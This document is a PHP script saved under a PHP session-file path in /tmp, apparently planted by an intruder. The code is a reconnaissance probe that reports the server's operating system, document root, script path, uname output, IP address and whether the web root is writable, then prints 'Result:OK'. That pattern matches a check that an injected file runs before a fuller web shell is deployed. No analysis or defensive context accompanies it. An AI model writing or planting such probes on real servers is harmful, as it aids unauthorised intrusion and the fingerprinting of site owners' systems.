File: //tmp/sess_de0c9d3695cbce8e5658250b3ed14b2f
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$ip = $_SERVER["SERVER_ADDR"]; if(empty($ip)) $ip = @gethostbyname($_SERVER["SERVER_NAME"]);$root = $_SERVER["DOCUMENT_ROOT"]; $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;$fname = basename(__FILE__);$dir = getcwd(); $dir = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;$os = (strtolower(substr(PHP_OS,0,3)) == "win") ? "WIN":"NIX";$console = 0;$curl = 0;print("OS:" . $os . "<br>");print("DR:" . str_replace("\\", "/", $root) . "<br>");print("SF:" . str_replace("\\", "/", $_SERVER["SCRIPT_FILENAME"]) . "<br>");print("SDT:" . @date("Y-m-d H:i:s", @filemtime($_SERVER["SCRIPT_FILENAME"])) . "<br>");print("DIR:" . str_replace("\\", "/", $dir) . "<br>");print("UNAME:" . (function_exists("php_uname") ? @php_uname() : "") . "<br>");print("IP:" . $ip . "<br>");print("RW:" . (is_writable($root) ? "1":"0") . "<br>");print("CE:" . $console . "<br>");print("CURL:" . $curl . "<br>");echo "Result:OK"; echo "</body></html>"; die;